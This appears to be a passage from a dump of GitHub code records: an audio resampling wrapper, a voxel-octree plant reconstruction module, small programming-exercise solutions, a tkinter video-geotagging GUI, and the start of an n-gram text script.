= [0.0] * (self._BUF_FRAME_COUNT * self._channels)\n self._data.input_frames = 0\n self._data.output_frames = self._BUF_FRAME_COUNT\n self._data.input_frames_used = 0\n self._data.output_frames_gen = 0\n self._data.end_of_input = 0\n\n process()\n\n while self._data.output_frames_gen > 0:\n extend_output()\n\n self._data.input_frames = 0\n self._data.output_frames = self._BUF_FRAME_COUNT\n self._data.input_frames_used = 0\n self._data.output_frames_gen = 0\n self._data.end_of_input = 1\n\n process()\n\n # Clear input\n self._input_data = [[] for _ in range(self._channels)]\n\n else:\n if frames_left == 0:\n self._input_data = [[] for _ in range(self._channels)]\n else:\n for ch in range(self._channels):\n self._input_data[ch] = self._input_data[ch][-frames_left:]\n\n return tuple(output_data)\n\n def reset(self):\n \"\"\"Reset the internal state of the sample rate converter.\n\n \"\"\"\n error = _samplerate.src_reset(self._state)\n if error != 0:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Could not reset resampling state: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n self._input_data = [[] for _ in range(self._channels)]\n self._allow_input = True\n\n def __del__(self):\n if self._state == None:\n return\n\n _samplerate.src_delete(self._state)\n self._state = None\n\n\nclass SampleRateError(Exception):\n \"\"\"Class for libsamplerate-related errors.\n\n \"\"\"\n\n\n_SRC_STATE = ctypes.c_void_p\n\nclass _SRC_DATA(ctypes.Structure):\n _fields_ = [('data_in', ctypes.POINTER(ctypes.c_float)),\n ('data_out', ctypes.POINTER(ctypes.c_float)),\n ('input_frames', ctypes.c_long),\n ('output_frames', ctypes.c_long),\n ('input_frames_used', ctypes.c_long),\n ('output_frames_gen', ctypes.c_long),\n ('end_of_input', ctypes.c_int),\n ('src_ratio', ctypes.c_double)]\n\n\n_samplerate = ctypes.CDLL(ctypes.util.find_library('samplerate'))\n\n_samplerate.src_strerror.argtypes = [ctypes.c_int]\n_samplerate.src_strerror.restype = ctypes.c_char_p\n\n_samplerate.src_new.argtypes = [\n ctypes.c_int, # converter type\n ctypes.c_int, # channels\n ctypes.POINTER(ctypes.c_int), # error code destination\n ]\n_samplerate.src_new.restype = _SRC_STATE\n\n_samplerate.src_process.argtypes = [_SRC_STATE, ctypes.POINTER(_SRC_DATA)]\n_samplerate.src_process.restype = ctypes.c_int\n\n_samplerate.src_reset.argtypes = [_SRC_STATE]\n_samplerate.src_reset.restype = ctypes.c_int\n\n_samplerate.src_set_ratio.argtypes = [_SRC_STATE, ctypes.c_double]\n_samplerate.src_set_ratio.restype = ctypes.c_int\n\n_samplerate.src_delete.argtypes = [_SRC_STATE]\n_samplerate.src_delete.restype = _SRC_STATE\n\n\n","repo_name":"Jasu/kunquat","sub_path":"kunquat/extras/samplerate.py","file_name":"samplerate.py","file_ext":"py","file_size_in_byte":10058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"33969619755","text":"from __future__ import division, print_function, absolute_import\n\nimport collections\nimport math\nimport numpy\n\nfrom .multi_view_reconstruction import get_bounding_box_voxel_projected\nfrom ..object import VoxelOctree\n# ==============================================================================\n# Function for no kep\n\ndef voxel_is_visible_in_image(voxel_center,\n voxel_size,\n image,\n projection,\n inclusive):\n \"\"\"\n Return True or False if the voxel projected on image with the function\n projection (projection) have positive value on image.\n\n **Algorithm**\n\n 1. Project the center voxel position on image if the position projected\n (x, y) is positive on image return True\n\n |\n\n 2. Project the bounding box of voxel in image, if one of the 4 corners\n position of the bounding box projected have positive value on image\n return True\n\n |\n\n 3. Check if one pixel containing in the bounding box projected on image\n have positive value, if yes return True else return False\n\n Parameters\n ----------\n voxel_center : (x, y, z)\n Center position of voxel\n\n voxel_size : float\n Size of side geometry of voxel\n\n image: numpy.ndarray\n binary image\n\n projection : function ((x, y, z)) -> (x, y)\n Function of projection who take 1 argument (tuple of position (x, y, z))\n and return this position 2D (x, y)\n\n Returns\n -------\n out : bool\n True if voxel have a positive correspondence on image otherwise return\n False\n \"\"\"\n\n height_image, length_image = image.shape\n x, y = projection(voxel_center)\n\n if (0 <= x < length_image and\n 0 <= y < height_image and\n image[int(y), int(x)] > 0):\n return True\n\n # ==========================================================================\n\n x_min, x_max, y_min, y_max = get_bounding_box_voxel_projected(\n voxel_center, voxel_size, projection)\n\n if (x_max < 0 or x_min >= length_image or\n y_max < 0 or y_min >= height_image):\n return inclusive\n\n # if ((not (0 <= x_min < length_image or 0 <= x_max < length_image)) or\n # (not (0 <= y_min < height_image or 0 <= y_max < height_image))):\n # return inclusive\n\n x_min = int(min(max(math.floor(x_min), 0), length_image - 1))\n x_max = int(min(max(math.ceil(x_max), 0), length_image - 1))\n y_min = int(min(max(math.floor(y_min), 0), height_image - 1))\n y_max = int(min(max(math.ceil(y_max), 0), height_image - 1))\n\n if (image[y_min, x_min] > 0 or\n image[y_max, x_min] > 0 or\n image[y_min, x_max] > 0 or\n image[y_max, x_max] > 0):\n return True\n\n # ==========================================================================\n\n if numpy.any(image[y_min:y_max + 1, x_min:x_max + 1] > 0):\n return True\n\n return False\n\n\n\ndef voxel_is_fully_visible_in_image(voxel_center,\n voxel_size,\n image,\n projection):\n\n height_image, length_image = image.shape\n\n # ==========================================================================\n\n x_min, x_max, y_min, y_max = get_bounding_box_voxel_projected(\n voxel_center, voxel_size, projection)\n\n x_min = int(min(max(math.floor(x_min), 0), length_image - 1))\n x_max = int(min(max(math.ceil(x_max), 0), length_image - 1))\n y_min = int(min(max(math.floor(y_min), 0), height_image - 1))\n y_max = int(min(max(math.ceil(y_max), 0), height_image - 1))\n\n # ==========================================================================\n\n if numpy.all(image[y_min:y_max + 1, x_min:x_max + 1] > 0):\n return True\n\n return False\n\n\ndef remove_surrounded(leaf_nodes):\n kept = collections.deque()\n for leaf in leaf_nodes:\n\n if not leaf.is_surrender():\n kept.append(leaf)\n\n return kept\n\n\ndef remove_surrounded_fully_visible(leaf_nodes,\n images_projections,\n error_tolerance=0):\n kept = collections.deque()\n for leaf in leaf_nodes:\n\n if leaf.is_surrender():\n\n voxel_center = leaf.position\n voxel_size = leaf.size\n negative_weight = 0\n\n for image, projection in images_projections:\n if not voxel_is_fully_visible_in_image(\n voxel_center, voxel_size, image, projection):\n negative_weight += 1\n if negative_weight > error_tolerance:\n break\n\n if not negative_weight <= error_tolerance:\n kept.append(leaf)\n\n else:\n kept.append(leaf)\n\n return kept\n\n# ==============================================================================\n\n\ndef _keep_visible(voxels_node,\n image_views,\n error_tolerance=0):\n\n kept = collections.deque()\n for voxel_node in voxels_node:\n\n voxel_position = voxel_node.position\n voxel_size = voxel_node.size\n negative_weight = 0\n\n for image_view in image_views:\n if not voxel_is_visible_in_image(\n voxel_position,\n voxel_size,\n image_view.image,\n image_view.projection,\n image_view.inclusive):\n negative_weight += 1\n if negative_weight > error_tolerance:\n break\n\n if negative_weight <= error_tolerance:\n kept.append(voxel_node)\n\n else:\n voxel_node.data = False\n\n return kept\n\n\n# ==============================================================================\n\ndef reconstruction_3d_octree(image_views,\n voxels_size=4,\n error_tolerance=0,\n voxel_center_origin=(0.0, 0.0, 0.0),\n world_size=4096,\n verbose=False):\n \"\"\"\n Construct a list of voxel represented object with positive value on binary\n image in images of images_projections.\n\n Parameters\n ----------\n images_projections : [(image, projection), ...]\n List of tuple (image, projection) where image is a binary image\n (numpy.ndarray) and function projection (function (x, y, z) -> (x, y))\n who take (x, y, z) position on return (x, y) position according space\n representation of this image\n\n voxels_size : float, optional\n Size of side geometry of voxel that each voxel will have\n\n error_tolerance : int, optional\n\n\n voxel_center_origin : (x, y, z), optional\n Center position of the first original voxel, who will be split.\n\n world_size: int, optional\n Minimum size that the origin voxel size must include at beginning\n\n voxel_centers : collections.deque, optional\n List of first original voxel who will be split. If None, a list is\n create with the voxel_center_origin value.\n\n verbose : bool, optional\n If True, print for each iteration of split, number of voxel before and\n after projection on images\n\n Returns\n -------\n out : collections.deque\n List of visible voxel projected on each image according\n the error_tolerance\n \"\"\"\n\n if len(image_views) == 0:\n raise ValueError(\"Len images view have not length\")\n\n voxel_octree = VoxelOctree.from_position(\n voxel_center_origin, world_size, True)\n\n leaf_nodes = collections.deque()\n leaf_nodes.append(voxel_octree.root)\n\n nb_iteration = 0\n while voxels_size < world_size:\n voxels_size *= 2.0\n nb_iteration += 1\n\n for i in range(nb_iteration):\n\n tmp = collections.deque()\n for leaf in leaf_nodes:\n tmp.extend(leaf.creates_sons())\n leaf_nodes = tmp\n\n if verbose is True:\n print('Iteration', i + 1, '/', nb_iteration, end=\"\")\n print(' : ', len(leaf_nodes), end=\"\")\n\n leaf_nodes = _keep_visible(leaf_nodes,\n image_views,\n error_tolerance)\n\n # Gain time is not enough for keeping that\n # if i + 1 < nb_iteration:\n # leaf_nodes = remove_surrounded_fully_visible(leaf_nodes,\n # images_projections,\n # error_tolerance)\n\n if verbose is True:\n print(' - ', len(leaf_nodes))\n\n return voxel_octree\n","repo_name":"openalea/phenomenal","sub_path":"src/openalea/phenomenal/multi_view_reconstruction/_multi_view_reconstruction_octree.py","file_name":"_multi_view_reconstruction_octree.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"2344919828","text":"import sys\nsys.setrecursionlimit(10 ** 9)\n\n\n# 분할 정복\ndef divide(start, end, lev):\n # 시작 점과 끝 점이 크로스되면 리턴\n if start > end:\n return\n center = (start + end) // 2 # 루트 노드\n level[lev].append(n[center]) # 루트 노드를 레벨의 따라 리스트에 추가\n divide(start, center - 1, lev + 1) # 왼쪽 서브 트리의 루트 노드를 재귀적으로 탐색\n divide(center + 1, end, lev + 1) # 오른쪽 서브 트리의 루트 노드를 재귀적으로 탐색\n\n\nk = int(sys.stdin.readline())\nn = list(map(int, sys.stdin.readline().split()))\nlevel = [[] for _ in range(k)] \n\n# 분할 탐색\ndivide(0, len(n) - 1, 0)\n\n# 각 레벨의 따라 노드를 출력\nfor i in level:\n print(*i)\n","repo_name":"junjange/CodingTest","sub_path":"baekjoon/Tree/9934.py","file_name":"9934.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19774465544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef main():\n entrada = input().split()\n eur = int(entrada[0])\n cent = int(entrada[1])\n \n eur500 = eur // 500\n eur = eur % 500\n print('Bitllets de 500 euros:', eur500)\n eur200 = eur // 200\n eur = eur % 200\n print('Bitllets de 200 euros:', eur200)\n eur100 = eur // 100\n eur = eur % 100\n print('Bitllets de 100 euros:', eur100)\n eur50 = eur // 50\n eur = eur % 50\n print('Bitllets de 50 euros:', eur50)\n eur20 = eur // 20\n eur = eur % 20\n print('Bitllets de 20 euros:', eur20)\n eur10 = eur // 10\n eur = eur % 10\n print('Bitllets de 10 euros:', eur10)\n eur5 = eur // 5\n eur = eur % 5\n print('Bitllets de 5 euros:', eur5)\n eur2 = eur // 2\n eur = eur % 2\n print('Monedes de 2 euros:', eur2)\n print('Monedes de 1 euro:', eur)\n\n cent50 = cent // 50\n cent = cent % 50\n print('Monedes de 50 centims:', cent50)\n cent20 = cent // 20\n cent = cent % 20\n print('Monedes de 20 centims:', cent20)\n cent10 = cent // 10\n cent = cent % 10\n print('Monedes de 10 centims:', cent10)\n cent5 = cent // 5\n cent = cent % 5\n print('Monedes de 5 centims:', cent5)\n cent2 = cent // 2\n cent = cent % 2\n print('Monedes de 2 centims:', cent2)\n print('Monedes de 1 centim:', cent)\n\n\nmain()\n","repo_name":"NIL6NIL6/Jutge-Learning-to-program","sub_path":"01 - Introduction/17 - P81629 - Canvi mínim.py","file_name":"17 - P81629 - Canvi mínim.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74430855825","text":"import tkinter as tk\nimport tkinter.filedialog as fg\nfrom backend import Project\nimport os\nimport datetime\nimport pandas as pd\nfrom pytz import timezone\nimport pytz\nfrom threading import Thread\n\n#WINDOW CLASS FORMAT (doesnt include __init__)\n#1. WINDOW VARIABLES\n#2. WINDOW ELEMENTS\n#3. DRAW COMMANDS\n#4. WINDOW FUNCTIONS\n\nclass GeotagTool(tk.Tk): # controller\n \n def __init__(self, *args, **kwargs): \n \n tk.Tk.__init__(self, *args, **kwargs) \n \n self.project = Project()\n \n container = tk.Frame(self) \n container.pack(side = \"top\", fill = \"both\", expand = True) \n container.grid_rowconfigure(0, weight = 1) \n container.grid_columnconfigure(0, weight = 1) \n \n self.frames = {} \n \n for F in (StartPage, LoadProjectPage, LoadDataPage, ExportPage): \n \n frame = F(container, self) \n \n self.frames[F] = frame \n \n frame.grid(row = 0, column = 0, sticky =\"nsew\") #This is the problem, also have to convert all grids to packs\n \n self.show_frame(StartPage) \n \n def show_frame(self, cont): \n frame = self.frames[cont] \n frame.tkraise() \n \n# Choose to create a project or load an existing project \nclass StartPage(tk.Frame): \n def __init__(self, parent, controller): \n\n tk.Frame.__init__(self, parent) \n \n #WINDOW VARIABLES\n version = '0.0.1'\n \n #WINDOW ELEMENTS\n window_label = tk.Label(self,text ='Geotag Tool '+version,font=('Arial',12,'bold'))\n \n create_button = tk.Button(self, text ='New Project', \n command = lambda : controller.show_frame(LoadDataPage))\n \n load_button = tk.Button(self, text ='Load Project', \n command = lambda : controller.show_frame(LoadProjectPage))\n \n #DRAW COMMANDS\n window_label.grid(row = 0, column = 0, pady = 10)\n create_button.grid(row = 3, column = 0, padx = 10, pady = 10, sticky = 'W') \n load_button.grid(row = 4, column = 0, padx = 10, pady = 10, sticky = 'W') \n\n#Page where user can select a project folder that has been previously generated and load the data from that folder\nclass LoadProjectPage(tk.Frame): \n \n def __init__(self, parent, controller): \n tk.Frame.__init__(self, parent)\n \n #WINDOW VARIABLES\n self.controller = controller\n self.parent = parent\n \n #WINDOW ELEMENTS\n path_button = tk.Button(self, text = 'Select',\n command = self.get_p_path)\n \n path_label = tk.Label(self, text = 'Project File( .pkl): ')\n \n self.path_str = tk.StringVar()\n \n self.path_entry = tk.Entry(self, textvariable = self.path_str)\n \n load_button = tk.Button(self, text = 'Load Project',\n command = self.load_project)\n \n back_button = tk.Button(self, text =\"Back\", \n command = lambda : controller.show_frame(StartPage)) \n \n #DRAW COMMANDS\n path_button.grid(row = 1, column = 3, sticky = 'W', pady = 15)\n path_label.grid(row = 1, column = 1, sticky = 'W', pady = 15)\n self.path_entry.grid(row = 1, column = 2, sticky = 'W', pady = 15, ipadx = 90)\n load_button.grid(row = 6, column = 1, sticky = 'W', pady = 15)\n back_button.grid(row = 6, column = 2, sticky = 'W', pady = 15)\n \n #WINDOW FUNCTIONS\n def get_p_path(self):\n self.projectPath = tk.filedialog.askopenfilename(filetypes=[('Project Files', '*.pkl')])\n self.path_str.set(str(self.projectPath))\n \n def load_project(self):\n if self.path_str.get() == '':\n self.path_entry.configure({\"background\": \"red\"})\n return\n else:\n self.path_entry.configure({\"background\": \"white\"})\n self.controller.project.load(projectFile = self.path_str.get())\n \n for attr in ['projectName','config','videos','tracks']:\n if attr in vars(self.controller.project):\n setattr(self.controller, attr, getattr(self.controller.project, attr))\n self.controller.project.create(self.controller.project.projectName, \n self.controller.project.config, \n videos = self.controller.project.videos, \n tracks =self.controller.project.tracks)\n frame = MatchPage(self.parent, self.controller)\n self.controller.frames[MatchPage] = frame\n frame.grid(row = 0, column = 0, sticky =\"nsew\")\n for attr in ['time_col','lat_col','long_col','ele_col','offset']:\n if attr in vars(self.controller.project):\n setattr(self.controller, attr, getattr(self.controller.project, attr))\n frame.time_col.set(self.controller.time_col)\n frame.lat_col.set(self.controller.lat_col)\n frame.long_col.set(self.controller.long_col)\n frame.ele_col.set(self.controller.ele_col)\n frame.offset.set(self.controller.offset)\n \n self.controller.show_frame(MatchPage)\n \n# Autoscan on: select folder where input files are; Autoscan off select video and track files individually \nclass LoadDataPage(tk.Frame): \n \n def __init__(self, parent, controller): \n \n tk.Frame.__init__(self, parent) \n \n #WINDOW VARIABLES\n self.controller = controller\n self.parent = parent\n time = datetime.datetime.now()\n projectName = 'project'+ time.strftime('%Y-%m-%d_%H%M%S')\n self.projectName = projectName\n self.yoffset = 1\n \n #WINDOW ELEMENTS\n window_label = tk.Label(self,text ='Project Setup',font=('Arial',12,'bold'))\n \n self.autoscan_int = tk.IntVar()\n autoscan_check = tk.Checkbutton(self, text='', variable=self.autoscan_int, width = 5)\n autoscan_label = tk.Label(self, text = 'Autoscan')\n \n self.next_button = tk.Button(self, text = 'Continue', command = self.get_input)\n \n self.name_str = tk.StringVar(self)\n self.name_str.set(self.projectName)\n name_label = tk.Label(self, text = 'Project Name: ')\n self.name_entry = tk.Entry(self, textvariable = self.name_str)\n \n self.pconfig_str = tk.StringVar(self)\n self.pconfig_str.set('EXIF')\n p_config = tk.OptionMenu(self, self.pconfig_str, 'EXIF', 'trident')\n p_config_label = tk.Label(self, text = 'Project Config: ')\n \n back_button = tk.Button(self, text =\"Back\", \n command = lambda : controller.show_frame(StartPage))\n \n #DRAW COMMANDS\n window_label.grid(row = -1+self.yoffset, column = 1, sticky = 'W', pady = 10)\n name_label.grid(row = 0+self.yoffset, column = 1, sticky = 'W', pady = 10)\n self.name_entry.grid(row = 0+self.yoffset, column = 2, sticky = 'W', pady = 15, ipadx = 45)\n p_config_label.grid(row = 2+self.yoffset, column = 1, sticky = 'W', pady = 10)\n p_config.grid(row = 2+self.yoffset, column = 2, sticky = 'W', pady = 10)\n autoscan_check.grid(row = 3+self.yoffset, column = 2, sticky = 'W', pady = 10)\n autoscan_label.grid(row = 3+self.yoffset, column = 1, sticky = 'W', pady = 10)\n self.next_button.grid(row = 8+self.yoffset, column = 1, sticky = 'W', pady = 10)\n back_button.grid(row=8+self.yoffset, column = 2)\n \n #WINDOW FUNCTIONS\n def get_i_path(self):\n self.inputPath = str(tk.filedialog.askdirectory())+'/'\n self.ipath_str.set(self.inputPath)\n \n def get_p_path(self):\n self.projectPath = str(tk.filedialog.askdirectory())+'/'\n self.ppath_str.set(self.projectPath)\n self.get_p_name()\n \n def get_p_name(self):\n self.projectName = self.name_str.get()\n \n def get_video(self):\n video = tk.filedialog.askopenfilename()\n self.videos.append(video)\n self.videos_str.set(str([i.split('/')[-1] for i in self.videos]))\n \n def get_track(self):\n track = tk.filedialog.askopenfilename()\n self.tracks.append(track)\n self.tracks_str.set(str([i.split('/')[-1] for i in self.tracks]))\n \n def get_input(self):\n if self.name_str.get() == '':\n self.name_entry.configure({\"background\": \"red\"})\n return\n else:\n self.name_entry.configure({\"background\": \"white\"})\n \n self.next_button.destroy()\n if self.projectName != None:\n autoscan = self.autoscan_int.get() == 1\n if autoscan is True:\n ipath_button = tk.Button(self, text = 'Select',\n command = self.get_i_path)\n self.ipath_str = tk.StringVar(self)\n self.ipath_entry = tk.Entry(self, textvariable = self.ipath_str)\n ipath_label = tk.Label(self, text = 'Input Folder: ')\n \n next_button1 = tk.Button(self, text = 'Scan For Files', command = self.autoscan)\n \n ipath_button.grid(row = 4+self.yoffset, column = 3, padx = 10, pady = 10, sticky = 'W')\n self.ipath_entry.grid(row = 4+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n ipath_label.grid(row = 4+self.yoffset, column = 1, padx = 10, pady = 10, sticky = 'W')\n next_button1.grid(row = 5+self.yoffset, column = 1, padx = 10, pady = 10)\n \n if autoscan is False:\n self.videos = []\n self.tracks = []\n video_button = tk.Button(self, text = 'Add Video', command = self.get_video)\n self.video_str = tk.StringVar(self)\n self.video_entry = tk.Entry(self, textvariable = self.video_str)\n \n track_button = tk.Button(self, text = 'Add Track', command = self.get_track)\n self.track_str = tk.StringVar(self)\n self.track_entry = tk.Entry(self, textvariable = self.track_str)\n \n self.load_str = tk.StringVar()\n load_status = tk.Label(self, textvariable = self.load_str)\n load_button = tk.Button(self, text ='Load Files', \n command = self.load_files)\n \n video_button.grid(row = 5+self.yoffset, column = 1, padx = 10, pady = 10)\n self.video_entry.grid(row = 5+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n track_button.grid(row = 6+self.yoffset, column = 1, padx = 10, pady = 10)\n self.track_entry.grid(row = 6+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n load_status.grid(row = 8+self.yoffset, column = 2, pady = 10, sticky = 'W')\n load_button.grid(row=8+self.yoffset, column=1, padx = 10, pady = 10)\n\n def autoscan(self):\n if self.ipath_str.get() == '':\n self.ipath_entry.configure({\"background\": \"red\"})\n return\n else:\n self.ipath_entry.configure({\"background\": \"white\"})\n videos = []\n tracks = []\n self.next_button.pack_forget()\n for filename in os.listdir(str(self.inputPath)):\n if 'MP4' in filename.split('.'):\n if len(filename.split('.')) <= 2:\n videos.append(str(self.inputPath)+filename)\n if 'gpx' in filename.split('.'):\n if len(filename.split('.')) <= 2:\n tracks.append(str(self.inputPath)+filename)\n if 'csv' in filename.split('.'):\n if len(filename.split('.')) <= 2:\n tracks.append(str(self.inputPath)+filename)\n self.videos = videos\n self.tracks = tracks\n \n video_label = tk.Label(self, text= 'Videos: ')\n self.video_str = tk.StringVar(self)\n self.video_str.set(str([i.split('/')[-1] for i in self.videos]))\n self.video_entry = tk.Entry(self, textvariable=self.video_str)\n \n \n track_label = tk.Label(self, text= 'Tracks: ')\n self.track_str = tk.StringVar(self)\n self.track_str.set(str([i.split('/')[-1] for i in self.tracks]))\n self.track_entry = tk.Entry(self, textvariable=self.track_str)\n \n \n self.load_str = tk.StringVar()\n load_status = tk.Label(self, textvariable = self.load_str)\n \n load_button = tk.Button(self, text ='Load Files', \n command=self.load_files)\n\n video_label.grid(row = 6+self.yoffset, column = 1, padx = 10, pady = 10)\n self.video_entry.grid(row = 6+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n track_label.grid(row = 7+self.yoffset, column = 1, padx = 10, pady = 10)\n self.track_entry.grid(row = 7+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n load_status.grid(row = 8+self.yoffset, column = 2, sticky = 'W')\n load_button.grid(row=8+self.yoffset, column=1)\n \n def load_files(self):\n if self.video_str.get() == '':\n self.video_entry.configure({\"background\": \"red\"})\n return\n else:\n self.video_entry.configure({\"background\": \"white\"})\n if self.track_str.get() == '':\n self.track_entry.configure({\"background\": \"red\"})\n return\n else:\n self.video_entry.configure({\"background\": \"white\"})\n \n self.config = self.pconfig_str.get()\n self.load_str.set('Loading files...')\n self.controller.project.create(self.projectName, self.config, videos = self.videos, tracks = self.tracks)\n frame = MatchPage(self.parent, self.controller) \n self.controller.frames[MatchPage] = frame \n frame.grid(row = 0, column = 0, sticky =\"nsew\")\n self.controller.show_frame(MatchPage)\n\n# Main function called on inputs: desired columns, time offset, maxtimediff \nclass MatchPage(tk.Frame): \n def __init__(self, parent, controller): \n \n tk.Frame.__init__(self, parent) \n \n #WINDOW VARIABLES\n self.controller = controller\n columns = list(self.controller.project.pointsDFs[0].columns)\n self.controller.time_col = 'None'\n self.controller.lat_col = 'None'\n self.controller.long_col = 'None'\n self.controller.ele_col = 'None'\n self.controller.offset = ''\n \n #WINDOW ELEMENTS\n self.time_col = tk.StringVar(self)\n self.time_col.set(self.controller.time_col)\n time_col_label = tk.Label(self, text = 'Desired Time Column:')\n time_col_menu = tk.OptionMenu(self, self.time_col, *columns)\n \n self.lat_col = tk.StringVar(self)\n self.lat_col.set(self.controller.lat_col)\n lat_col_label = tk.Label(self, text = 'Desired Lat Column:')\n lat_col_menu = tk.OptionMenu(self, self.lat_col, *columns)\n \n self.long_col = tk.StringVar(self)\n self.long_col.set(self.controller.long_col)\n long_col_label = tk.Label(self, text = 'Desired Long Column:')\n long_col_menu = tk.OptionMenu(self, self.long_col, *columns)\n \n self.ele_col = tk.StringVar(self)\n self.ele_col.set(self.controller.ele_col)\n ele_col_label = tk.Label(self, text = 'Desired Ele Column:')\n ele_col_menu = tk.OptionMenu(self, self.ele_col, *columns)\n \n self.offset = tk.StringVar(self)\n self.offset.set(self.controller.offset)\n offset_label = tk.Label(self, text = 'Manual Time Offset: ')\n offset_label2 = tk.Label(self, text = '(leave blank for auto)')\n offset_entry = tk.Entry(self, textvariable = self.offset)\n \n self.match_status_str = tk.StringVar(self)\n match_status = tk.Label(self,textvariable = self.match_status_str)\n match_button = tk.Button(self, text ='Match', command = self.do_match)\n \n back_button = tk.Button(self, text ='Back', \n command = lambda : controller.show_frame(StartPage))\n\n #DRAW COMMANDS\n time_col_label.grid(row = 1, column = 1, sticky = 'E', pady = 10)\n time_col_menu.grid(row = 1, column = 2, sticky = 'W', pady = 10)\n \n lat_col_label.grid(row = 2, column = 1, sticky = 'E', pady = 10)\n lat_col_menu.grid(row = 2, column = 2, sticky = 'W', pady = 10)\n \n long_col_label.grid(row = 3, column = 1, sticky = 'E', pady = 10)\n long_col_menu.grid(row = 3, column = 2, sticky = 'W', pady = 10)\n \n ele_col_label.grid(row = 4, column = 1, sticky = 'E', pady = 10)\n ele_col_menu.grid(row = 4, column = 2, sticky = 'W', pady = 10)\n \n offset_label.grid(row = 5, column = 1, sticky = 'W', pady = 10)\n offset_label2.grid(row = 5, column = 3, sticky = 'W', pady = 10)\n offset_entry.grid(row = 5, column = 2, sticky = 'W', pady = 15)\n \n match_status.grid(row = 8, column = 2, sticky = 'W')\n match_button.grid(row = 8, column = 1, sticky = 'W')\n \n back_button.grid(row=9, column=5)\n \n #WINDOW FUNCTIONS\n def do_match(self):\n try:\n self.continue_button.pack_forget()\n except AttributeError: pass\n info = True\n self.points = 0\n for i in [self.time_col, self.lat_col, self.long_col]:\n if i == 'None':\n info = False\n break\n if info == True:\n self.controller.project.match(self.time_col.get(), \n self.lat_col.get(), \n self.long_col.get(), \n self.ele_col.get(),\n self.offset.get(),\n self.match_status_str) \n \n self.continue_button = tk.Button(self, text ='Continue', \n command = lambda : self.controller.show_frame(ExportPage))\n \n \n self.continue_button.grid(row=9, column=4)\n \nclass ExportPage(tk.Frame): \n def __init__(self, parent, controller): \n tk.Frame.__init__(self, parent) \n \n #WINDOW VARIABLES\n self.controller = controller\n \n #WINDOW ELEMENTS\n window_label = tk.Label(self,text ='Export Page',font=('Arial',12,'bold'))\n \n ppath_label = tk.Label(self, text = 'Project Save Path: ')\n self.ppath_str = tk.StringVar()\n self.ppath_entry = tk.Entry(self, textvariable = self.ppath_str)\n ppath_button = tk.Button(self, text = 'Select',\n command = self.get_p_path)\n save_button = tk.Button(self, text = 'Save Project', command = self.save_project)\n self.s_status_str = tk.StringVar(self)\n s_status_label = tk.Label(self, textvariable = self.s_status_str)\n \n epath_label = tk.Label(self, text = 'Image Export Path: ')\n self.epath_str = tk.StringVar()\n self.epath_entry = tk.Entry(self, textvariable = self.epath_str)\n epath_button = tk.Button(self, text = 'Select',\n command = self.get_e_path)\n export_button = tk.Button(self, text = 'Export Project', command = self.threading)\n self.e_status_str = tk.StringVar(self)\n e_status_label = tk.Label(self, textvariable = self.e_status_str)\n \n \n back_button = tk.Button(self, text =\"Back\", \n command = lambda : controller.show_frame(StartPage))\n \n #DRAW COMMANDS\n window_label.grid(row = 0, column = 0, pady = 10)\n \n ppath_label.grid(row = 1, column = 0, padx = 10, pady = 10, sticky = 'W')\n self.ppath_entry.grid(row = 1, column = 1, padx = 10, pady = 10, sticky = 'W', ipadx = 90)\n ppath_button.grid(row = 1, column = 2, padx = 10, pady = 10, sticky = 'W')\n save_button.grid(row = 2, column = 1, padx = 10, pady = 10, sticky = 'W')\n s_status_label.grid(row = 2, column = 2, padx = 10, pady = 10, sticky = 'W')\n \n epath_label.grid(row = 3, column = 0, padx = 10, pady = 10, sticky = 'W')\n self.epath_entry.grid(row = 3, column = 1, padx = 10, pady = 10, sticky = 'W', ipadx = 90)\n epath_button.grid(row = 3, column = 2, padx = 10, pady = 10, sticky = 'W')\n export_button.grid(row = 4, column = 1, padx = 10, pady = 10, sticky = 'W')\n e_status_label.grid(row = 4, column = 2, padx = 10, pady = 10, sticky = 'W')\n \n #WINDOW FUCTIONS\n def get_p_path(self):\n self.projectPath = str(tk.filedialog.askdirectory()) + '/'\n self.ppath_str.set(self.projectPath)\n \n def get_e_path(self):\n self.exportPath = str(tk.filedialog.askdirectory()) + '/'\n self.epath_str.set(self.exportPath)\n \n def save_project(self):\n if self.ppath_str.get() == '':\n self.ppath_entry.configure({\"background\": \"red\"})\n return\n else:\n self.ppath_entry.configure({\"background\": \"white\"})\n self.controller.project.save(self.ppath_str.get(), self.s_status_str)\n \n def threading(self): \n t1= Thread(target=self.export_project) \n t1.setDaemon(True) \n t1.start()\n \n def export_project(self):\n if self.epath_str.get() == '':\n self.epath_entry.configure({\"background\": \"red\"})\n return\n else:\n self.epath_entry.configure({\"background\": \"white\"})\n \n self.controller.project.export(self.epath_str.get(), self.e_status_str, self.controller)\n\n","repo_name":"becklabs/geotag-gui","sub_path":"frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":21691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74929207505","text":"# 这是一个示例 Python 脚本。\n\n# 按 Shift+F10 执行或将其替换为您的代码。\n# 按 Double Shift 在所有地方搜索类、文件、工具窗口、操作和设置。\n\nimport random\nfrom random import randint\n\n\ndef wordListSum(wordList):\n num = 0\n for word, value in wordList.items():\n num += value\n return num\n\n\ndef RandomWord(wordList):\n rand_index = randint(1, wordListSum(wordList))\n for word, value in wordList.items():\n rand_index -= value\n if rand_index <= 0:\n return word\n\n\ndef read_gram_dict():\n with open(r\"C:\\Users\\yuanhuanfa\\Desktop\\nlp\\2-gram.txt\", 'r', encoding=\"utf-8\") as f:\n f = f.read().splitlines()\n result_dict = {}\n text = []\n for line in 